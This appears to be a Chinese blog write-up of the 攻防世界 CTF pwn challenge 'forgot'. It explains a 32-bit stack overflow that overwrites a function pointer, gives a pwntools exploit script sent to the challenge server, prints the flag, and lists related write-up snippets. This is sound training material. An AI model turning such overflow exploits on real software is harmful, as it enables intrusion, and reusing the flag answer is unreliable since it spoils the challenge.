[攻防世界]forgot

于 2022-06-21 14:26:19 发布
阅读量234 收藏
点赞数 1
分类专栏: PWN # 攻防世界 文章标签: 安全 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125389984
版权

[攻防世界]forgot

解析

还是先checksec一下,看看有什么信息。
在这里插入图片描述
开了一个NX,32位,拖入ida中进行分析,一打开一大片东西。
在这里插入图片描述
先找逻辑区域,第一次输入的最多可以上去32字节。
在这里插入图片描述
第二次也是32字节,去看一下v2的栈中的位置。
在这里插入图片描述
在这里插入图片描述
在这里,那么就是直接从这里开始直接填满+shell的地址。
在这里插入图片描述
需要32个字符 + 0x080486CC即可,那么脚本可写。

脚本

from pwn import *
#p = process('./forgot')
p = remote('111.200.241.244',49849)
context(os = 'linux',arch = 'i386',log_level='debug')
p.sendlineafter(b'>',b'aaaa')
payload = b'B'*(0x74-0x54)+p32(0x080486CC)
p.sendlineafter(b'>',payload)
p.interactive()

脚本成立最后运行。
在这里插入图片描述
flag是cyberpeace{206411c5846436ab7b084e7ff3c93e2d}

逆向萌新
关注
专栏目录
攻防世界--进阶区--forgot
Rt1Text的博客
06-19 285
32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出 可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v
攻防世界 forgot
10-04 1278
1.题目 2.IDA分析 3.流程分析 流程:输入名字,邮箱,邮箱校验完,执行v3+--v14处的代码。v3原本指向sub_8048604的,我们发现sub_80486CC才是我们需要运行的函数。 思路:①为了避免v14影响结果,输入字符避免进入case判断。②通过输入邮箱进行栈溢出覆盖v3的内容,使它指向sub_80486CC。exp如下: from pwn import * #io = process('./level2') io = remote('220.249.52...
攻防世界forgot
qq_49853414的博客
03-19 4331
adworld_forgot 这道题单纯的考对栈里数据的掌握,以及C程序调用 int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWORD v3[10]; // [esp+30h] [ebp-54h] char s[32]; // [esp+58h] [ebp-2Ch] BYREF int v5; // [esp+78h] [ebp-Ch] size_t i; // [e
攻防世界pwn题:forgot
m0_62396648的博客
06-05 503
该文件是32位的,canary和PIE保护机制没开。总览:该函数就是:v5初值为1,对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句,最后调用相应的函数。同时,发现文件里面已经含有cat flag的函数: 函数snprintf介绍: printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后
攻防世界:PWN刷题-forgot
m0_53932372的博客
12-30 2274
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
forgotpassword
03-14
标题"forgotpassword"提示我们这里可能涉及到一个关于如何在Python环境下实现忘记密码重置流程的项目。...通过对`forgotpassword-master`项目的研究,我们可以深入理解这一过程,并提升在Python Web开发中的技能。
C表达式((void (*)(void))0();
雾里看花
11-17 1720
C表达式((void (*)(void))0();通过一步步来讲解: 没有参数和不返回值void f(void)定义一个指针没有参数和返回值void (*p)(void)定义一个仅有类型的指针(void(*))(void)定义一个强转类型(类型定义在括号内,跟着一个值)(void (*)(void))0到目前为止我们定义了一个由0强转成一个指向函数且返回值。这个转换时一个指针到函数的类型。(yo
攻防世界(Pwn) forgot---栈溢出;(方法二)
半岛铁盒的博客
03-02 345
攻防世界(Pwn) forgot—栈溢出;(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[--v5] v5的值随着for循环 会发生改变 v2输入是溢出点 v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了 干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC 此时无论v5等于什么,我们都会得到目标 fla
攻防世界(PWN)forgot
苗_的博客
10-12 263
感觉有些wp写的不是特别详细,当时我看的时候有的地方也是看不太懂... 先拖进ida中看一下: 找到溢出点,因为我们分配给了v2 32byte的内存,但是scanf不限制长度,所以这里可以溢出。 第88行就是决定程序走向的语句了。 初步思路就是栈上的变量覆盖,在v2这里溢出,覆盖掉v3,然后让程序走到sub_80486CC: 既然我们要覆盖v3,那么根据(&v3+ --v14)我们需要让v14的值不变,因为v14 = 1则--v14 = 0,这样程序就会顺利的走到v3. 观察
攻防世界)(pwn)forgot
PLpa的博客
07-21 2370
这题我也是想了好久啊,实在是没找到什么办法,后来还是把题目给摸透了根据经验一个个试出来的方法!!! 拿到题目下载附件查看保护: 只开了NX,嗯。。。 进入IDA,————惊了,这个是啥子意思??? 一大堆奇奇怪怪的东西,实在是看不懂,我们只能看看几个关键的输入点: 第一个输入name: 没有什么东西,进行看string v2 : 我们看到距离32的地方,有个0x54的函数指针: 找...
进阶区forgotg攻防世界
shanwei274的博客
04-11 166
攻防世界进阶区–forgot 前言,这题中看不中用啊宝友!!! 1.查看保护 第一反应就是蛮简单的,32位. 2.获取信息(先运行程序看看) 装的可以,蛮多的东西。 但是就是中看不中用 3.ida 进去看看 里面有两个输入,第一个我本来以为能溢出覆盖掉v14的数值,然后在最后的这句 用函数指针(还是指针函数来着我忘了),去调用这道题给出来的system,结果我试了试发现覆盖不到,就很气。 平日见到的scanf(%s)覆盖是不多的,所以没有太想到这里溢出点是第二个向v2里面传输数据。 使用cyclic
攻防世界-pwn forgot(栈内变量覆盖)
菜的只能随便写写博客
10-17 763
0x01 文件检查 32位elf 无栈保护 无地址随机化   0x02 程序运行分析  发现有两个输入的地方,并且第一个地方有回显。   0x03 IDA分析  如图,阅读程序结构后,发现第二个输入点(41行)可以进行栈溢出,第88行是调用的栈里面的函数地址,所以,如果将栈里面的*(&v3 + --v14)这个地址的内容变成我们需要的函数地址,就可以了。  搜索字符串,发...
攻防世界forgot——让人眼花目眩的一道题(详细菜鸡向)
weixin_48066554的博客
02-10 1492
攻防世界forgot——让人眼花目眩的一道题 今天做了一道攻防世界的进阶题,看起来复杂的一匹,但是实际上也就这吧 (随手关掉刚刚百度到的wp [doge]),做完后最直观的感受就是自己的代码阅读能力还有待提高。话不多说,先check个sec: 只开了NX(栈不可执行),四舍五入等于没开保护,直接上伪代码 反汇编伪代码如下: int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWOR
攻防世界——pwn_forgot
syk的博客
05-28 1710
checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...
攻防世界》forgot栈空间题
csdn546229768的博客
11-16 2977
哈哈哈,讲下这题的思路,拿到题目又是一大堆的字符串显示在控制台上,本想着又是一道逻辑题,披着逆向算法的外套,害,没办法继续分析 前面输入name用了fgets函数但是限制输入长度了,所以直接忽略,然后就是输入一个数对其进行简单的小算法了,我显示分析了一波算法,然后根据出题人的提示说这个,但是我好像还是摸不清题目的漏洞在哪里,就一直摸摸摸,先是简单的看了下全局伪代码,加上程序运行状况,发现你输入的数就算是通过了9层判断条件好像也是一样的打印一些字符串 这十个函数里面都是一样的没什么区别 然后出题人那个提示
攻防世界(Pwn) forgot---栈溢出;(方法一)
半岛铁盒的博客
03-02 689
介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一 文件运行流程是: 1.先输入名字 2. 输入一串字符串 3.for循环验证字符串v5的值改变;4.返回v3[–5]函数; 1.溢出点 scanf函数 2.漏洞利用 最终返回的是 v3[--v5] 的一个函数, v5的值是在for循环之中改变的;v5的初始值是1; 把函数返回的目的地改为   0x80486CC就可以了; 只要修改 v3[0]-v3[9] 其中一个就可以了,这里选择修改v3[0] v3[--
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值